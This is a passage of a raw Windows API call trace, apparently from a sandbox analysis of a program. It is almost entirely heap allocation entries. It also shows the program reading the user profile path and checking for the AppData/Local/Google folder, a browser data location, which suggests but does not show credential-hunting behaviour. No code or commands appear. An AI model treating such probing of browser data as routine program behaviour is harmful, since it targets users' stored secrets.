(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0157.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0157.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0157.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0157.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0157.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0157.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0157.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0157.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0157.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0157.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0157.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0157.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0157.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0157.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0157.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0157.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0157.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0157.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0157.567] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0157.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0157.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0157.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa708 [0157.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0157.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0157.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0157.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0157.568] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0157.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0157.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0157.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0157.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0157.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0157.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0157.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0157.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0157.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0157.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0157.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0157.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0157.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0157.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0157.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0157.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0157.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0157.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0157.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0157.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0157.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0157.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0157.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0157.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0157.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72778 [0157.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0157.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0157.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0157.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72698 [0157.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0157.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0157.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0157.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6a8 [0157.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0157.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0157.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0157.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0157.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0157.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0157.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0157.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0157.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0157.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0157.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0157.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0157.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0157.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0157.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0157.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0157.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0157.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0157.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0157.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0157.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0157.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0157.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0157.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0157.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0157.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0157.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0157.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0157.570] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0157.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0157.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0157.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0157.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0157.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0157.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0157.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0157.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0157.570] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0157.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0157.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0157.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0157.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0157.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0157.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0157.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0157.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0157.571] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0157.571] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0157.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0157.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0157.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0157.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0157.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0157.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0157.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0157.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0157.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0157.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0157.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0157.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0157.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0157.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0157.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0157.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0157.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0157.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0157.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0157.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0157.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0157.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0157.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0157.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0157.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0157.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0157.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0157.572] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0157.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0157.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0157.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0157.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0157.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0157.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0157.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0157.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0157.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0157.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0157.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0157.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0157.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0157.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0157.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0157.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0157.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0157.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0157.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0157.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0157.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0157.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0157.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0157.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0157.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0157.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0157.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0157.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0157.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0157.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0157.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0157.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0157.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0157.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0157.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0157.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0157.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0157.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0157.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0157.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0157.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0157.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0157.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0157.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0157.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0157.573] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0157.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0157.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0157.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0157.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0157.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0157.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0157.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0157.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0157.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0157.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0157.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0157.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0157.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0157.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0157.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0157.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0157.581] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0157.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0157.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0157.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0157.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0157.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0157.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0157.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0157.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0157.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0157.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0157.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0157.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0157.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0157.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0157.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0157.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0157.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0157.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0157.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0157.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0157.582] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Google", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xadb6a93, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x4a3bd622, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x7e3bdb64, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google", cAlternateFileName="")) returned 0x9e20f8 [0157.582] FindClose (in: hFindFile=0x9e20f8 | out: hFindFile=0x9e20f8) returned 1 [0157.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0157.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0157.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0157.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0157.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: 